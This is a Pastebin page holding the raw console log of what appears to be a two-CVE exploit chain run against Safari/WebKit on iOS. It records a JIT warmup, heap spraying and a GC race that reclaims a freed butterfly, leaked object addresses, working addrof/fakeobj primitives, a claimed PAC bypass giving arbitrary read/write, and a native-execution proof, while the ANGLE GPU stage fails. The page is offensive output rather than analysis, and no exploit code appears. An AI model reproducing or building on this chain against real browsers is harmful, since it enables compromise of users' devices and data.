Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- === SYSINFO ===
- [02:04:37] === SYSTEM DETECTION ===
- [02:04:37] User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.1 Mobile/15E148 Safari/604.1
- [02:04:37] WebKit detected
- [02:04:37] Safari browser detected
- [02:04:37] iOS platform detected - BOTH CVEs applicable
- [02:04:37] WebGL2 available for ANGLE probe
- [02:04:37] Chained exploit probe ready.
- [02:04:37] Auto-run enabled: mode=chain starting in 1500ms
- === OUTPUT ===
- [02:04:39] ================================================
- [02:04:39] FULL EXPLOIT CHAIN: CVE-2025-43529 + CVE-2025-14174
- [02:04:39] ================================================
- [02:04:39] ========================================
- [02:04:39] STAGE 2: GPU Canary Harness Setup
- [02:04:39] ========================================
- [02:04:39] Goal: Build GPU-process canaries for post-trigger corruption detection
- [02:04:39] Texture canaries: 8
- [02:04:39] PBO canaries: 16
- [02:04:39] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
- [02:04:39] Baseline GPU canary snapshot captured
- [02:04:39] STAGE 2 COMPLETE: GPU canary harness ready
- [02:04:39] ========================================
- [02:04:39] STAGE 3: ANGLE OOB Trigger + GPU Oracles
- [02:04:39] ========================================
- [02:04:39] Goal: Trigger setSubImageImpl OOB path and check heap-oracle + baseline GPU canaries
- [02:04:39] WebGL2 unavailable or context lost; reinitializing Stage 2 context
- [02:04:39] ========================================
- [02:04:39] STAGE 2: GPU Canary Harness Setup
- [02:04:39] ========================================
- [02:04:39] Goal: Build GPU-process canaries for post-trigger corruption detection
- [02:04:39] Texture canaries: 8
- [02:04:39] PBO canaries: 16
- [02:04:39] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
- [02:04:39] Baseline GPU canary snapshot captured
- [02:04:39] STAGE 2 COMPLETE: GPU canary harness ready
- [02:04:39] WebGL2 unavailable or context already lost
- [02:04:39] Stage 3 duration: 36ms
- [02:04:39] ========================================
- [02:04:39] STAGE 1: WebKit UAF (CVE-2025-43529)
- [02:04:39] ========================================
- [02:04:39] Goal: Obtain addrof/fakeobj primitives via butterfly type confusion
- [02:04:39] Config: 15000 attempts, 64 spray arrays each
- [02:04:39] Phase 1.1: Initial warmup with both branch paths...
- [02:04:39] Warmup complete - both Phi paths exercised for DFG
- [02:04:39] Phase 1.2: JIT warmup (1000 iterations)...
- [02:04:39] JIT warmup complete - function should be DFG compiled
- [02:04:40] Phase 1.3: Recursive stack clearing warmup...
- [02:04:40] Recursive warmup complete
- [02:04:40] Phase 1.4: Main exploitation loop (15000 attempts)...
- [02:04:40] Racing GC marking vs store to freed object...
- [02:04:40] [0/15000] Racing... (64 arrays sprayed)
- [02:04:41] [500/15000] Racing... (32064 arrays sprayed)
- [02:04:42] [1000/15000] Racing... (64064 arrays sprayed)
- [02:04:42] [1135] BUTTERFLY RECLAIMED! Type confusion achieved!
- [02:04:42] unboxed_arr[0] = 2.242292602e-314
- [02:04:42] addrof(boxed_arr) = 0x10f3b29d0
- [02:04:42] addrof(uafArray) = 0x10b0c8c98
- [02:04:42] PRIMITIVES WORKING! Different addresses for different objects!
- [02:04:42] === LEAKED ADDRESSES (captured while primitives valid) ===
- [02:04:42] boxed_arr: 0x10f3b29d0
- [02:04:42] uafArray: 0x10b0c8c98
- [02:04:42] ArrayBuffer: 0x10b0cf748
- [02:04:42] Float64Array: 0x10b0cf808
- [02:04:42] Uint32Array: 0x10b0cf8c8
- [02:04:42] testObject: 0x10e930140
- [02:04:42] testArray: 0x10b0c8dd8
- [02:04:42] testFunction: 0x10e914f20
- [02:04:42] stage6FuncA: 0x10e914f40
- [02:04:42] stage6FuncB: 0x10e914f60
- [02:04:42] eval(): 0x10e81fde0
- [02:04:42] window: 0x10b0cc2c8
- [02:04:42] document: 0x10b0cecc8
- [02:04:42] fakeObjBuffer: 0x10b0cfec8
- [02:04:42] victimBuffer: 0x10b360148
- [02:04:42] victimF64: 0x10eaf8eb0
- [02:04:42] === PAC BYPASS OBJECTS ===
- [02:04:42] fakeArrayContainer: 0x10e834200
- [02:04:42] arrayReaderContainer: 0x10eb04130
- [02:04:42] realF64ForStealing: 0x10eaf8e50
- [02:04:42] stablePrimitivesBuffer:0x10b0cfe08
- [02:04:42] === INLINE STORAGE TEMPLATES ===
- [02:04:42] inlineTemplate: 0x10e834240
- [02:04:42] inlineTemplate2: 0x10eb04160
- [02:04:42] Corruption targets: 32/32 valid addresses
- [02:04:42] Target 0: 0x10b360388
- [02:04:42] Target 1: 0x10b360448
- [02:04:42] Valid addresses: 23/23
- [02:04:42] fakeobj test result: Got object!
- [02:04:42] fakeobj type: ArrayBuffer
- [02:04:42] === STAGE 1 PRIMITIVES ===
- [02:04:42] addrof: WORKING
- [02:04:42] fakeobj: WORKING
- [02:04:42] === INLINE STORAGE PAC BYPASS TESTS ===
- [02:04:42] 1. fakeobj self-test: true
- [02:04:42] 2. arb read (addr only): true
- [02:04:42] 3. arb write (verified): true
- [02:04:42] Template addr: 0x10e834240
- [02:04:42] Template2 addr: 0x10eb04160
- [02:04:42] read64/write64: CONSTRUCTED
- [02:04:42] PAC BYPASS: FULL ARB R/W ACHIEVED!
- [02:04:42] === EVIDENCE SUMMARY ===
- [02:04:42] addrof: VERIFIED
- [02:04:42] fakeobj: VERIFIED
- [02:04:42] inline storage access: VERIFIED
- [02:04:42] ANGLE trigger: NOT OBSERVED
- [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
- [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
- [02:04:42] ANGLE context loss/reset: NOT DETECTED
- [02:04:42] ANGLE corruption evidence: NOT DETECTED
- [02:04:42] arb r/w: VERIFIED
- [02:04:42] cross-process chain: NOT READY
- [02:04:42] sensitive data read: NOT VERIFIED
- [02:04:42] native execution proof: VERIFIED
- [02:04:42] full exploit chain: INCOMPLETE
- [02:04:42] STAGE 1 COMPLETE: addrof/fakeobj primitives obtained!
- [02:04:42] Total spray arrays allocated: 72650
- [02:04:42] ========================================
- [02:04:42] STAGE 5: Live In-Process R/W Proof
- [02:04:42] ========================================
- [02:04:42] Stage5 probe base: 0x10eb04190 (slot0=+0x10)
- [02:04:42] Stage5 source: stage1_leak
- [02:04:42] Stage5 candidates: stage1_leak@0x10eb04190=0x112233445566dd93:ok
- [02:04:42] Stage5 addr drift vs Stage1 leak: NO (stage1=0x10eb04190)
- [02:04:42] Sensitive token leaked via read64: YES
- [02:04:42] Leaked token: 0x112233445566dd93
- [02:04:42] Sensitive token overwritten via write64: YES
- [02:04:42] Verify base=0x112233445566dd93 js_before=0x112233445566dd93 marker_raw=0x11dd33ee00ccdd6c js_marker=0x11dd33ee00ccdd6c restore_raw=0x112233445566dd93 js_restore=0x112233445566dd93
- [02:04:42] No GPU evidence yet; running Stage 3 retry pass
- [02:04:42] ========================================
- [02:04:42] STAGE 3: ANGLE OOB Trigger + GPU Oracles
- [02:04:42] ========================================
- [02:04:42] Goal: Trigger setSubImageImpl OOB path and check heap-oracle + baseline GPU canaries
- [02:04:42] WebGL2 unavailable or context lost; reinitializing Stage 2 context
- [02:04:42] ========================================
- [02:04:42] STAGE 2: GPU Canary Harness Setup
- [02:04:42] ========================================
- [02:04:42] Goal: Build GPU-process canaries for post-trigger corruption detection
- [02:04:42] Texture canaries: 8
- [02:04:42] PBO canaries: 16
- [02:04:42] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
- [02:04:42] Baseline GPU canary snapshot captured
- [02:04:42] STAGE 2 COMPLETE: GPU canary harness ready
- [02:04:42] WebGL2 unavailable or context already lost
- [02:04:42] ========================================
- [02:04:42] STAGE 4: Chain Integration Gate
- [02:04:42] ========================================
- [02:04:42] Renderer primitives: READY
- [02:04:42] ANGLE path executed: NO
- [02:04:42] GPU evidence: ABSENT
- [02:04:42] heap-oracle=none, canary=none, context_lost=no
- [02:04:42] CHAIN NOT READY: Missing either renderer primitives or GPU-process evidence
- [02:04:42] === EVIDENCE SUMMARY ===
- [02:04:42] addrof: VERIFIED
- [02:04:42] fakeobj: VERIFIED
- [02:04:42] inline storage access: VERIFIED
- [02:04:42] ANGLE trigger: NOT OBSERVED
- [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
- [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
- [02:04:42] ANGLE context loss/reset: NOT DETECTED
- [02:04:42] ANGLE corruption evidence: NOT DETECTED
- [02:04:42] arb r/w: VERIFIED
- [02:04:42] cross-process chain: NOT READY
- [02:04:42] sensitive data read: VERIFIED
- [02:04:42] native execution proof: VERIFIED
- [02:04:42] full exploit chain: INCOMPLETE
- === RESULTS ===
- [02:04:42] ================================================
- [02:04:42] EXPLOIT CHAIN RESULTS
- [02:04:42] ================================================
- [02:04:42] Stage 1 (WebKit UAF): SUCCESS
- [02:04:42] Stage 2 (GPU Harness): SUCCESS
- [02:04:42] Stage 3 (ANGLE OOB): FAILED
- [02:04:42] Stage 4 (Chain Gate): FAILED
- [02:04:42] Stage 5 (Live In-Process R/W): SUCCESS
- [02:04:42] Stage 6 (Native Exec Proof): SUCCESS
- [02:04:42] --- EXPLOIT STATUS ---
- [02:04:42] PARTIAL: renderer-only evidence
- [02:04:42] • addrof/fakeobj path reached
- [02:04:42] --- VULNERABILITY DETAILS ---
- [02:04:42] CVE-2025-43529 (WebKit UAF):
- [02:04:42] Impact: Arbitrary code execution via type confusion
- [02:04:42] Vector: DFG Store Barrier Insertion Phase bug
- [02:04:42]
- [02:04:42] CVE-2025-14174 (ANGLE OOB):
- [02:04:42] Impact: Out-of-bounds write in GPU process
- [02:04:42] Vector: UNPACK_IMAGE_HEIGHT staging buffer undersize
- [02:04:42]
- [02:04:42] Current gate: chain is marked ready only with renderer + GPU evidence
- [02:04:42] Attack surface: Safari/WebKit on iOS 26.1
- [02:04:42] === EVIDENCE SUMMARY ===
- [02:04:42] addrof: VERIFIED
- [02:04:42] fakeobj: VERIFIED
- [02:04:42] inline storage access: VERIFIED
- [02:04:42] ANGLE trigger: NOT OBSERVED
- [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
- [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
- [02:04:42] ANGLE context loss/reset: NOT DETECTED
- [02:04:42] ANGLE corruption evidence: NOT DETECTED
- [02:04:42] arb r/w: VERIFIED
- [02:04:42] cross-process chain: NOT READY
- [02:04:42] sensitive data read: VERIFIED
- [02:04:42] native execution proof: VERIFIED
- [02:04:42] full exploit chain: INCOMPLETE
Advertisement